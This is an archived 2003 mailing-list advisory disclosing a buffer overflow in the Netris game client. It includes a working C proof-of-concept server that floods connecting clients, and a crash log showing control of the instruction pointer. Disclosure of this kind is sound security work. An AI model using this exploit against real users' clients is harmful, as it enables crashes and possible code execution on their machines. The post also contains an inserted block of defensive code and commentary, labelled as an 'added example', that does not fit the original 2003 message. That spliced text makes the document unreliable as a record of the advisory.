Netris client Buffer Overflow Vulnerability.

From: Shaun Colley (shaunigeat_private)
Date: Tue Aug 12 2003 - 10:03:02 PDT


    -[INTRODUCTION]-
    
    Netris is a Linux clone of the classic game Tetr*s,
    offering three main game modes: play an individual game;
    server mode, in which Netris binds to a port and waits for
    an incoming connection from an opponent's Netris client;
    and connect mode, in which Netris connects to an opponent's
    Netris client that is listening for connections on a
    selected port.  A vulnerability has already been
    discovered (http://www.securityfocus.com/bid/5680/info/)
    whereby, when Netris is run in listen mode, it is exposed
    to a "critical" buffer overflow due to insufficient bounds
    checking, which could give the attacker root privileges, or
    otherwise the UID of the user running Netris.  However, I
    have discovered a new vulnerability: Netris is also
    vulnerable to a similar buffer overflow attack when running
    in client mode (connecting to a remote opponent's Netris
    client in listen mode, rather than listening for an
    incoming connection), due to insufficient bounds checking
    of what the server sends.
    
    -[EXPLOIT]-
    
    The following code is a small PoC exploit program I have
    written to exploit the buffer overflow described above,
    causing a DoS (stack corruption and a crash of the Netris
    program).  It binds itself to a port and triggers the
    overflow in the Netris client when that client attempts to
    connect:
    
    
    ------------------------CUT HERE----------------------
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>      /* memset(), strlen() */
    #include <unistd.h>      /* close(), sleep() */
    #include <time.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #define BACKLOG 1
    int main(int argc, char *argv[]) {
            int sock, csock;
            struct sockaddr_in client;
            struct sockaddr_in me;
            socklen_t sinlen;
            char buffer[60001];

            if(argc < 2) {
                    printf("Usage: %s <port>\n", argv[0]);
                    exit(-1);
            }

            /* 60000 'a' bytes, NUL-terminated so strlen() below is well defined */
            memset(buffer, 'a', 60000);
            buffer[60000] = '\0';

            /* socket() reports failure with -1, not NULL */
            if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                    printf("Couldn't create socket!\n");
                    exit(-1);
            }

            memset(&me, 0, sizeof(me));
            me.sin_family = AF_INET;
            me.sin_port = htons(atoi(argv[1]));
            me.sin_addr.s_addr = INADDR_ANY;
            if(bind(sock, (struct sockaddr *)&me, sizeof(struct sockaddr)) == -1) {
                    perror("bind()");
                    exit(-1);
            }
            listen(sock, BACKLOG);
            printf("Listening on port %s for connections...\n", argv[1]);
            while(1) {
                    sinlen = sizeof(struct sockaddr);
                    csock = accept(sock, (struct sockaddr *)&client, &sinlen);
                    if(csock == -1) {
                            perror("accept()");
                            continue;
                    }
                    printf("Got connection, sending...\n");
                    send(csock, buffer, strlen(buffer), 0);
                    sleep(1);
                    close(csock);
            }
            return 0;
    }
    ------------------------CUT HERE----------------------
    
    
    Here is a simple example of the exploitation process
    of the Netris program:
    
    ------------------------CUT HERE----------------------
    
    [shaunige@localhost exploits]$ ./netris-exploit 1234
    Listening on port 1234 for connections...
    Got connection, sending...  
    
    # whilst meantime in the other window:
    
    [shaunige@localhost shaunige]$ netris -c localhost -p 1234
    Your opponent is using an old, incompatible version of
    Netris.  They should get the latest version.
    Segmentation fault (core dumped)
    
    [shaunige@localhost shaunige]$ gdb -c core.13140
    GNU gdb 5.2.1-2mdk (Mandrake Linux)
    Copyright 2002 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "i586-mandrake-linux-gnu".
    Core was generated by `netris -c localhost -p 1234'.
    Program terminated with signal 11, Segmentation fault.
    #0  0x61616161 in ?? ()
    (gdb) quit
    [shaunige@localhost shaunige]$
    
    ------------------------CUT HERE----------------------
    
    As you can see, I tried to connect to what I thought
    was my to-be opponent's Netris program in listen mode,
    and the listening server sent a huge string to the
    client, overflowing the buffer in which Netris expects
    to receive the greeting from the remote Netris program
    asking it to start the game.
    
    Obviously, rather than simply causing a DoS, the
    vulnerability can instead be exploited by an attacker to
    execute arbitrary code on the victim's machine, with the
    privileges of the user running Netris to connect to the
    listening port.
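    The bug class described above is a fixed-size greeting buffer filled from the network with no length check. The following bounded reader is an added example (my own code, not Netris's; Netris's real protocol and functions are not reproduced here, so `read_greeting`, `feed_greeting` and the sample greeting are hypothetical) showing how the client side should refuse an over-long greeting instead of letting it run past the buffer. The pipe harness feeds the same kind of 'a' run the PoC sends, shortened to fit a pipe.

```c
#include <errno.h>
#include <string.h>
#include <unistd.h>
/* Hypothetical bounded greeting reader: one newline-terminated line from fd
 * into buf, refusing anything that will not fit in cap bytes with its NUL.
 * Returns the stored length, or -1 on an over-long line, early EOF or error. */
ssize_t read_greeting(int fd, char *buf, size_t cap) {
    size_t n = 0;
    if (cap == 0) return -1;
    for (;;) {
        char c;
        ssize_t r = read(fd, &c, 1);
        if (r < 0) { if (errno == EINTR) continue; return -1; }
        if (r == 0) return -1;        /* peer closed before finishing the line */
        if (c == '\n') break;
        if (n + 1 >= cap) return -1;  /* no room for c plus the NUL: reject it */
        buf[n++] = c;
    }
    buf[n] = '\0';
    return (ssize_t)n;
}

/* Offline harness: pushes a constructed payload through a pipe so the reader
 * runs without a network peer (payload must fit the pipe buffer). */
ssize_t feed_greeting(const char *payload, size_t len, char *buf, size_t cap) {
    int fds[2]; ssize_t res;
    if (pipe(fds) != 0) return -1;
    if (write(fds[1], payload, len) != (ssize_t)len) {
        close(fds[0]); close(fds[1]); return -1;
    }
    close(fds[1]);
    res = read_greeting(fds[0], buf, cap);
    close(fds[0]);
    return res;
}

/* 200 bytes of 'a' with no newline (the shape of what the PoC above sends):
 * a 64-byte greeting buffer must answer -1 instead of being overrun. */
ssize_t oversized_greeting_verdict(void) {
    char payload[200], buf[64];
    memset(payload, 'a', sizeof payload);
    return feed_greeting(payload, sizeof payload, buf, sizeof buf);
}

/* Constructed well-formed greeting: its length (14) if stored intact, else -1. */
ssize_t normal_greeting_len(void) {
    char buf[64];
    ssize_t n = feed_greeting("hello opponent\n", 15, buf, sizeof buf);
    return (n == 14 && strcmp(buf, "hello opponent") == 0) ? n : -1;
}
```

    With the length check in place, the 'a' run from the PoC is rejected before a single byte lands outside the buffer, so the return address can never become 0x61616161 as in the gdb output above.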
    
    
    -[PATCH/WORKAROUND]-
    
    I have not yet written a patch to fix this
    vulnerability in Netris; I am in the process of
    contacting the vendor regarding this matter.
    
    
    -[CREDIT]-
    
    I discovered this vulnerability on 11/08/03.
    
    
    
    Thank you for your time.
    Shaun.
    
    
    
    
    
    
    



    This archive was generated by hypermail 2b30 : Tue Aug 12 2003 - 10:59:30 PDT